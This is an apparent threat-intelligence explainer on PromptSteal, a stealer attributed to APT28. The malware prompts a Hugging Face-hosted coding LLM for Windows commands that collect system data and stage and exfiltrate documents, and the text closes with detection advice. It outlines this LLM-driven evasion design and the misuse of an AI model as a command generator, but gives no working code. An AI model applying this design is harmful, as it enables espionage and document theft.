PromptSteal (also known as PROMPTSTEAL or tracked by Ukrainian CERT-UA as LAMEHUG) is a sophisticated AI-integrated data miner malware first observed in live operations in June 2025. It represents a landmark case: the first documented instance of malware actively querying a large language model (LLM) during execution in real-world cyberattacks, according to Google Threat Intelligence Group (GTIG). Unlike traditional stealers with fixed, hard-coded commands, PromptSteal dynamically generates its malicious actions by prompting an external LLM, making it more flexible, adaptive, and potentially harder to signature-detect.

As of March 2026, PromptSteal remains one of the clearest examples of AI moving from attacker productivity aid to runtime component in live espionage. It underscores the need for behavioral analytics, network controls on AI service domains, script execution restrictions, and rapid patching of initial access vectors (often spear-phishing in APT28 campaigns). While not yet widespread among cybercriminals, its success in state hands foreshadows broader adoption in more autonomous, prompt-driven attack frameworks.

This malware was deployed by the Russian government-backed actor APT28 (also known as FROZENLAKE, Fancy Bear, or Sednit), a GRU-linked group notorious for espionage operations. It targeted Ukrainian entities in geopolitically motivated campaigns, marking a shift from experimental AI misuse to operational deployment.

Core Characteristics and Functionality

• Programming Language — Written in Python and typically packaged as a standalone executable using PyInstaller for easier distribution and execution on Windows systems without requiring a Python interpreter.
• Type — Information stealer / data miner focused on reconnaissance and exfiltration of system details and documents.
• Primary Goal — Collect sensitive environmental data (hardware, processes, network, services, Active Directory info) and stage/user files (especially Office documents, PDFs) for theft, while evading traditional detection by avoiding static command strings.
• Operational Status — Observed in live operations (unlike more experimental siblings like PromptFlux). Samples showed ongoing development, including added obfuscation layers and evolving command-and-control (C2) mechanisms in later variants.

How PromptSteal Works: LLM as a Remote Command Generator

The malware’s core innovation is treating an LLM as an on-demand “command compiler”:

1. Masquerade & Initial Execution — It disguises itself as a benign “image generation” program. When run, it presents a fake interactive prompt interface to the user (e.g., asking for image descriptions), creating the illusion of legitimate activity while operating silently in the background.
2. API Integration — It connects to the Hugging Face Inference API (a public platform hosting open-source models) to query the specific LLM Qwen2.5-Coder-32B-Instruct (a code-focused model from Alibaba’s Qwen family). It likely uses stolen or embedded API tokens for access.
3. Prompt Engineering — Carefully crafted, natural-language prompts are sent to the model. These prompts instruct the LLM to output single-line Windows commands (cmd.exe or PowerShell compatible) for specific malicious tasks. Examples include:
   • Gathering comprehensive system information (e.g., systeminfo, wmic, netstat, process lists, etc.) and saving it to a file like %PROGRAMDATA%\info\info.txt.
   • Creating staging directories.
   • Recursively searching and copying targeted file types (e.g., .docx, .pdf, .xlsx) from user folders such as Documents, Desktop, and Downloads into the staging area. Prompts are highly specific and designed to produce clean, executable one-liners that the malware can run blindly.
4. Command Execution — The malware parses the LLM’s response (expecting just the command output, no extra text) and executes it locally via subprocess calls or similar mechanisms.
5. Exfiltration — Collected data (info.txt + staged files) is packaged and sent to attacker-controlled infrastructure, typically via HTTP POST, SFTP, or other methods. C2 channels evolved in newer samples.
6. Evasion & Flexibility — By generating commands dynamically at runtime, the malware avoids hard-coded strings that antivirus or EDR tools might flag. New reconnaissance or theft logic can be introduced simply by changing the prompt logic in updates—no recompilation of large payloads required.

This “just-in-time” command generation allows APT28 to adapt behaviors without redeploying entirely new binaries, reducing development overhead and complicating static analysis.

Attribution and Context

• Threat Actor — Strongly attributed to APT28 (FROZENLAKE) by GTIG, with medium-confidence corroboration from CERT-UA. The group has a long history of targeting Ukraine with espionage-focused tools.
• Discovery Timeline — First identified in June 2025 in attacks on Ukrainian government and related entities. Publicly detailed by CERT-UA (as LAMEHUG) and later included in Google’s November 2025 GTIG AI Threat Tracker report.
• Broader Family — Part of an early wave of LLM-integrated malware identified in 2025, alongside PROMPTFLUX (self-rewriting dropper), QUIETVAULT (credential stealer), FRUITSHELL, and PROMPTLOCK.

Implications for Cybersecurity

PromptSteal highlights how accessible public LLMs (especially open-source ones on Hugging Face) enable state actors to build adaptive tooling with minimal custom code. Key challenges for defenders include:

• Lack of static signatures — Commands are generated fresh each run.
• Outbound traffic to AI APIs — Unusual connections to huggingface.co endpoints (especially inference APIs) can be an indicator.
• Behavioral detection needs — Focus on monitoring for blind execution of dynamically created commands, unusual file staging in %PROGRAMDATA%, mass document copying, and exfil patterns.
• API Abuse Monitoring — Organizations and platforms can watch for anomalous prompt patterns resembling reconnaissance or theft instructions.